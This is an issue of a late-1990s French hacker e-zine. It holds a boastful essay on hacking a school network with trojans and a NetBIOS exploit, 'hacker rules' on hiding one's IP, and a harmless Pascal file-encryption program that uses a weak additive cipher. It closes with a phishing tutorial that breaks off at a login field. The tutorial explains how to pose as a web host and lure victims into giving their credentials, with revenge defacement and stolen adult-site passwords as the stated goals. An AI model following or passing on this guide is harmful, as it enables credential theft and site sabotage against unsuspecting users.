DeathlyBy pour m'avoir accepter dans leur équipe ** ** Ma mère qui paye mes factures FT (France Télécon pour ceux ki auraient pas capté! ) ** ** Mes potes de Bahut: mini-kiss,frisk,rafale,moune ** ** Mes potes de #ioda (bisous aux filles!) ** ** Tous les lecteurs de cet e-zine et tous ceux ki m'ont aidé à mieux comprendre l'underground !!! ** ** Et aussi à tous les rédacteurs d'e-zines !!!(Snowcrash !) ** ********************************************************************************************************************** Proverbe d'outre internaute : mieux vaut un petit lamer de base ki trvaille plutôt k'une élite ki se la coule douce ! ================================================================================================ Pourquoi je hacke??? By Faust ================================================================================================ Vous m'avez déjà plusieurs fois demandé pourkoi je hackais; ce n'est pas pour faire chier le monde, mais c'est un plaisir Il est vrai ke je n'ai pas pénétré beaucoup de machines (2 avec l'exploit Netbios et 3 avec le troyen et une au master paradise :) ) mais lorske j'ai réussi à rentrer sur le réseau de mon bahut, et de leur faire imprimer une foto de profs trukée avec écrit dessous : "il ne faut jamais sous-estimer les capacités de ces élèves" et ben j'ai hurlé de joie, et j'ai dévalé les escaliers comme un fou !!! (chez nous, y'a 3 étages) Ma mère m'a demandé si je ne devenais pas fou; je lui ai tout expliké, elle à compris (donc vous aussi non?) En fait , je suis connecté à internet depuis avril 98, et en septembre, alors ke j'étais trankilou sur irc, mon dd se met à gratter comme un fou; je me dis "MERDE, pourkoi il fait ça lui?" je ne savais pas encore k'aprés ma connection, mon répertoire photo1 avait disparu (euh...si le hacker se reconnais, il a du avoir une surprise en l'ouvrant car ce n'était ke des fotos ke j'avais fais de mes profs alors...!) Je télécharge donc un firewall et son crack sur les conseils d'un pote; je me crois invincible, mais 2 mois après, même shéma: je suis sur IRC, il est 22h, mon dd s'affole et une boîte de dialogue apparaît:"Veuillez patienter pendant ke nous déplaçons vos fichiers en base mémoire" a ce moment là, j'ai sauté sur mon modem et arraché la prise. Je télécharge donc le "Bouffe troyen" (pour l'adresse, m'envoyer un mail passke j'm'en souviens plus) J'étais inffecté par le socket 2.3, et backoriffice. (pas cool ça!) Et puis, il y a un mois, sur IRC, chez un pote, son PC tapait du texte tout seul !(Casper, c'est toi?) Alors voilà, j'ai lu tout ce ke je trouvais, et j'ai réussi kelkes trucs, mais je ne me considère pas comme un hacker. (je ne juge pas ke je suis assez bon pour avoir ce titre, je pense ke je suis un type ki s'y connais un tout tit peu et ki fait profiter de son savoir à d'autres.) Si j'ai hacké mon bahut, c'est passke le prof d'informatike m'a qualifié de bidouilleur, et ke ça m'a pas plu ! (ouais, bon il faut toujours un prétexte alors voilà! :) ) Je me suis aussi essayé au crack, et j'ai été aidé par Le Magicien et Simon TêteCreuse, mais bon, je suis encore débutant ! Règles du hacker: - toujours être disponible et patient - être discret, prendre une addresse e-mail genre caramail ou hotmail - se sous-estimer pour deux raisons: - La persone ke vous avez en face ne se méfiera pas - Vous ne serez pas surpris par des questions auxkelles vous ne pouvez pas répondre - Ne jamais effacer des trucs d'un dd sauf si c'est un pédophile à la con ! (je peux pas les supporter !) - Soyez toujours prêts à faire partager votre savoir (si à l'âge de 8 ans je savais tout ce ke je sais , à l'âge actuel, arrivé à l'âge où je suis,j'en saurais davantage !) - Veillez à ne pas laisser de traces (masquez votre ip, connectez-vous à un proxy bidon) - il n'est jamais trop tard pour apprendre (je commence à apprendre à programmer et je projette déjà de vous pondre un prog ki encrypte et décrypte vos messages !!! je sais, c'est pas gagné, mais je demanderais de l'aide !!!) Voilà, c'est tout, j'espère ne pas vous avoir trop pris la tête avec tout ça, mais c'était pour vous montrer ke tout le monde peut devenir un hacker (il suffit de s'accrocher, être curieux et ne pas hésiter à demander des conseils !!!) Sur ce, bonne continuation ! A bientôt, si j'ai pas trop de boulot au bahut! *** You were kicked by FAUST *** *** Now you are disconnected *** faust19@caramail.com irc.funradio.fr #ioda ou #Mat "I can't beleive the news today I can't close my eyes and make it go away" .U2 Sunday Bloody Sunday. Ndcedru : Super tu as réussi l'exploit netbios (nbtstat grâce à deathlyby j'espere? :) heu sinon avec des trojans c'est un peu simple comme méthode je trouve, mais ça se démocratise de plus en plus les hackers (hier encore j'en ai vu à la TV) maintenant tu as plein de programmes,trojans... tu as juste à clicker sur un button et ca marche. Je me rappel à mon époque ou on devait tapper plein de commandes, chercher un peu, aller sous dos... Maintenant tout se perd ;) ================================================================================================ Le cryptage, suite By DeEPspY ================================================================================================ Pour faire suite au texte de Faust, je vous propose de vous expliquer un petit prog que j'ai fait en pascal pour crypter des fichiers. Le fonctionnement de ce prog est assez simple. Il faut donc un fichier, par exemple essai.txt avec quelque chose dedans, ici il sera ecrit: salut et puis donner au prog un mot de passe: ici ce sera: az . Le programme va donc lire le premier caractere du fichier, ici s et prendre sa valeur ascii, pour s=115, puis il va lire la premiere lettre du mot de passe, ici a et va aussi prendre sa valeur ascii, a=97 puis il va ecrire dans un nouveau fichier le caractere qui correspond a la somme des deux valeurs ascii, 115+97=212 , nous aurons donc le caractere È . Puis le prog prend la deuxieme lettre du fichier avec la deuxieme lettre du code, ainsi de suite, quand on arrive a la fin du mot de passe on reprend au debut et si la somme des valeurs depasse 255 on soustrait 256. Pour decoder le fichier, le programme marche de la meme maniere, il faut donc avoir le mem mot de passe, sinon le fichier n'est pas le meme du tout. J'ai ete claire??? Bon je vous montre maintenant le code source pour turbo pascal 6.0 les explication sont notees entre {} Program codeur; uses crt; Var ObjFile : String[80]; SrcFile : String[80]; Passe : String[80]; InpFile : File of Char; OutFile : Text; B, ChVal, Cpt : Integer; Ch : Char; PROCEDURE Usage; {explication si on lance le exe sans ligne de commande} Begin TextColor(Red); Gotoxy(25,25); Write('Codeur (Version 1.0)'); Writeln(' Ecrit par DeEPspY'); Writeln; TextColor(7); Write('Codeur est tout simplememt un programme qui code vos fichier ;-}'); Write(' et qui les rends donc inlisables. Il est conseiller de l''utiliser avec Decodeur, '); Write('ce qui serait plutot utile pour decoder vos fichiers.'); Writeln; Writeln; Write('Ceci est fait par une addition et une soustraction des valuers ascii donnee dans'); Write(' le mot de passe ,specifie par l''uitlisateur, avec les valeurs ascii du fichier. '); Writeln; Writeln('Ce programme est l''ouvre de DeEPspy pour le mag DEATHLY BY '); Writeln('Pour coder un fichier :'); Writeln('C:>codeur [source] [destination] [mot de passe]'); Writeln; End; PROCEDURE GetParams; {saisi le nom du fichier a coder, la destination, et le mot de passe} Begin If ( ( ParamCount <> 3 ) ) then Begin Usage; Halt; End Else Begin SrcFile := ParamStr(1); For B := 1 to Length( SrcFile ) Do SrcFile[B] := UpCase( SrcFile[B] ); ObjFile := ParamStr(2); For B := 1 to Length( ObjFile ) Do ObjFile[B] := UpCase( ObjFile[B] ); Passe := ParamStr(3); End; {Initial Else...} End; { GetParams } PROCEDURE OpenFiles; {ouvre la source} Begin Assign(InpFile, SrcFile); {$I-} Reset(InpFile); {$I+} If (IoResult<>0) Then Begin Writeln('Fichier: ', SrcFile, ' non trouver.', #7); Halt; End; Assign(OutFile, ObjFile); Rewrite(OutFile); End; PROCEDURE Process; {le + important, le cryptage} Begin Cpt := 1; While Not Eof( InpFile ) Do Begin Read(InpFile, Ch); {lit la premiere lettre} ChVal := Ord( Passe[ Cpt ]) + Ord( Ch ); {nouvel letre = ascii de la premiere letre du mot de passe+ ascii de la premiere lettre} If ChVal > 255 Then {si > 255 on soustrait 256} ChVal := ChVal - 256; Cpt := Cpt +1; {on prend la deuxieme lettre du mot de passe, et si le mot est fini on recommence a 1} If Cpt > Length( Passe ) Then Cpt :=1; Write(OutFile, Chr( ChVal )); {on ecrit dans le nouveau fichier} End; {while} End; {Process} PROCEDURE CloseFiles; {on ferme tout} Begin Close(InpFile); Close(OutFile); End; BEGIN {programme principal} GetParams; OpenFiles; Process; CloseFiles; END. C'est tout simple non? Bon je vous donne aussi le code pour decrypter, le voici. le fonctionnement est presque le meme que pour coder. Program Decodeur; Uses crt; Var ObjFile : String[80]; SrcFile : String[80]; Passe : String[80]; InpFile : File Of Char; OutFile : Text; B, ChVal, Cpt : Integer; Ch : Char; PROCEDURE Usage; Begin TextColor(red); Gotoxy(25,25); Write('Decodeur (Vers. 1.0)'); Writeln('Ecrit par DeEPspY'); Writeln; TextColor(7); Write('DECODEUR sert a decoder un fichier qui a ete code par '); Writeln('CODEUR (et pas un autre).'); Writeln('Ce programme est l''oeuvre de DeEPspY pour le mag DEATHLY BY'); Writeln; Writeln; Writeln('Pour decoder un fichier :'); Writeln('C:>decodeur [source] [destination] [mot de passe]'); Writeln; End; PROCEDURE GetParams; Begin If ( ( ParamCount <> 3 ) ) then Begin Usage; Halt; End Else Begin SrcFile := ParamStr(1); For B := 1 to Length( SrcFile ) Do SrcFile[B] := UpCase( SrcFile[B] ); ObjFile := ParamStr(2); For B := 1 to Length( ObjFile ) Do ObjFile[B] := UpCase( ObjFile[B] ); Passe := ParamStr(3); End; {Initial Else...} End; { GetParams } PROCEDURE OpenFiles; Begin Assign(InpFile, SrcFile); {$I-} Reset(InpFile); {$I+} If (IoResult<>0) Then Begin Writeln('fichier: ', SrcFile, ' inexistant.', chr(7)); Halt; End; Assign(OutFile, ObjFile); Rewrite(OutFile); End; PROCEDURE Process; Begin Cpt := 1; While Not Eof( InpFile ) Do Begin Read(InpFile, Ch); ChVal := Ord( Ch ) - Ord( Passe[ Cpt ] ); If ChVal < 0 Then ChVal := ChVal + 256; Cpt := Cpt +1; If Cpt > Length( Passe ) Then Cpt :=1; Write(OutFile, Chr( ChVal )); End; {while} End; {Process} PROCEDURE CloseFiles; Begin Close(InpFile); Close(OutFile); End; Begin GetParams; OpenFiles; Process; CloseFiles; End. Voila, si vous utilisez ce prog tel quel, laissez mon nom, et si vous apportez des amelioration, faite moi signe : deepspy@caramail.com C'est rien qu'un petit prog mais c'est deja pas si mal, meme si ca vaut pas Georges Sand. ================================================================================================ Le SE via HTML by Deepspy ================================================================================================ Voici comment faire du SE sans trops de problemes pour ceux qui ont la voie qui chevrote au telephonent, mais aussi pour ceux qui veulent se venger en dtruisant les sites de leurs ennemis, ou encore pour ceux qui voudrait des passes pour les sites XXX. En fait ce qu'il faut c'est d'abord s'inscrire sur un hebergeur de site (Multimania, chez, respublica, citeweb, xoom,...) puis choisir un nom evocateur, tout cela depend donc de ce que vous voulez faire. Pour avoir des passes de sites XXX il vaut mieux prendre un nom attirant, pour pouvoir hacker un site un nom comme aide24, info8, probleme,... Ensuite il faut creer une page qui fasse reel, avec des photos X pour un site de culs, avec un fond que l'on rencontre habituellement chez son hebergeur, n'hesiter donc pas a pomper ca sur d'autres sites. Ensuite tout depend de ce que vous voulez faire, on va donc traiter 2 possibilités. Vous voulez legerement transformer le site d'un ami, il faut donc lui envoyer un email avec votre pseudo (aide24, probleme2, info5,...) et lui dire qu'il y a actuellement un probleme (n'oubliez pas que vous devez vous faire passez pour l'hebergeur) et qu'il faut donc qu'il vienne sur votre page pour modifier 2 ou 3 trucs. Il faut que votre email fasse vraiment realiste, alors n'en mettez pas trop peu et pas trop trop .Comme vous aurez fait une belle interface graphique, votre pigeon va y croire et vous allez pouvoir lui demander son login et son password, grace au script html si dessous.
Login :